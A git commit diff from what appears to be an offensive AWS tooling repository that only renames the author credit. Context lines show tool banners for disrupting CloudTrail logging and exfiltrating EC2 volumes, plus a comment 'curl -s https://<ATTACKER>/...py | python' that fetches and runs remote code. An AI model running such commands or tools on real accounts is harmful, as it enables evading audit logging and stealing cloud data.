Mariusz B. / mgeeky
2021-10-24 23:11:42 +02:00
parent 2e115fe796
commit 558762a498
78 changed files with 124 additions and 124 deletions


@ -33,7 +33,7 @@ bash $ python3 disruptCloudTrailByS3Lambda.py --help
:: AWS CloudTrail disruption via S3 Put notification to Lambda
Disrupts AWS CloudTrail logging by planting Lambda that deletes S3 objects upon their creation
Mariusz B. / mgeeky '19, <mb@binary-offensive.com>
Mariusz Banach / mgeeky '19, <mb@binary-offensive.com>
usage: disruptCloudTrailByS3Lambda.py [options] <region> [trail_name]
@ -64,7 +64,7 @@ bash $ python3 disruptCloudTrailByS3Lambda.py --access-key ASIAXXXXXXXXXXXXXXXX
:: AWS CloudTrail disruption via S3 Put notification to Lambda
Disrupts AWS CloudTrail logging by planting Lambda that deletes S3 objects upon their creation
Mariusz B. / mgeeky '19, <mb@binary-offensive.com>
Mariusz Banach / mgeeky '19, <mb@binary-offensive.com>
[.] Will be working on Account ID: 712800000000
[.] Step 1: Determine trail to disrupt
@ -181,7 +181,7 @@ attacker $ python3 ./exfiltrate-ec2.py --help
:: exfiltrate-ec2
Exfiltrates EC2 data by creating an image of it or snapshot of it's EBS volume
Mariusz B. / mgeeky '19, <mb@binary-offensive.com>
Mariusz Banach / mgeeky '19, <mb@binary-offensive.com>
usage: ./exfiltrate-ec2.py [-h] [--region REGION] [--profile PROFILE]
[--access-key ACCESS_KEY] [--secret-key SECRET_KEY]
@ -236,7 +236,7 @@ attacker $ python3 ./exfiltrate-ec2.py --region us-east-1 -v --profile default -
:: exfiltrate-ec2
Exfiltrates EC2 data by creating an image of it or snapshot of it's EBS volume
Mariusz B. / mgeeky '19, <mb@binary-offensive.com>
Mariusz Banach / mgeeky '19, <mb@binary-offensive.com>
[.] Using attacker's profile: default
[.] Using victim's profile: victim-profile


@ -3,7 +3,7 @@
# This script simply calls `aws sts assume-role` using hardcoded parameters, in order
# to retrieve set of session credentials and reformat it into ~/.aws/credentials file format.
#
# Mariusz B., mgeeky '19-20
# Mariusz Banach, mgeeky '19-20
#


@ -38,7 +38,7 @@
# - boto3
# - pytest
#
# Author: Mariusz B. / mgeeky '19, <mb@binary-offensive.com>
# Author: Mariusz Banach / mgeeky '19, <mb@binary-offensive.com>
#
@ -427,7 +427,7 @@ def parseOptions(argv):
print('''
:: AWS CloudTrail disruption via S3 Put notification to Lambda
Disrupts AWS CloudTrail logging by planting Lambda that deletes S3 objects upon their creation
Mariusz B. / mgeeky '19, <mb@binary-offensive.com>
Mariusz Banach / mgeeky '19, <mb@binary-offensive.com>
''')
parser = argparse.ArgumentParser(prog = argv[0], usage='%(prog)s [options] <region> [trail_name]')


@ -5,7 +5,7 @@
# policy statements. Then goes through allowed permissions to pick all of them out.
# Finally, checks every allowed permission against a list of known troublesome ones.
#
# Mariusz B., mgeeky '19, <mb@binary-offensive.com>
# Mariusz Banach, mgeeky '19, <mb@binary-offensive.com>
# v0.1
#


@ -33,7 +33,7 @@
# WARNING: Since this method creates a publicly available AMI image that will contain customer sensitive data, it is
# not recommended to use it during legal AWS Penetration Tests
#
# Author: Mariusz B. / mgeeky, '19, <mb@binary-offensive.com>
# Author: Mariusz Banach / mgeeky, '19, <mb@binary-offensive.com>
#
import sys
@ -422,7 +422,7 @@ def parseOptions(argv):
print('''
:: exfiltrate-ec2
Exfiltrates EC2 data by creating an image of it or snapshot of it's EBS volume
Mariusz B. / mgeeky '19, <mb@binary-offensive.com>
Mariusz Banach / mgeeky '19, <mb@binary-offensive.com>
''')
parser = argparse.ArgumentParser(prog = argv[0])


@ -9,7 +9,7 @@
#
# $ curl -s https://<ATTACKER>/exfiltrateLambdaTasksDirectory.py | python
#
# Author: Mariusz B., '19, <mb@binary-offensive.com>
# Author: Mariusz Banach, '19, <mb@binary-offensive.com>
#
import zipfile, StringIO


@ -3,7 +3,7 @@
# This script leverages couple of methods in order to validate that passed
# domain is a S3 bucket indeed.
#
# Mariusz B., 2019, <mb@binary-offensive.com>
# Mariusz Banach, 2019, <mb@binary-offensive.com>
#
require 'resolv'
@ -245,7 +245,7 @@ def main(args)
puts %{
:: Identifies AWS S3 Buckets via couple of methods
Mariusz B. 19', <mb@binary-offensive.com>
Mariusz Banach 19', <mb@binary-offensive.com>
}
if ARGV.length != 1


@ -20,7 +20,7 @@
# Requirements:
# - gem "aws-sdk-ec2"
#
# Author: Mariusz B., '19, <mb@binary-offensive.com>
# Author: Mariusz Banach, '19, <mb@binary-offensive.com>
#
require 'aws-sdk-ec2'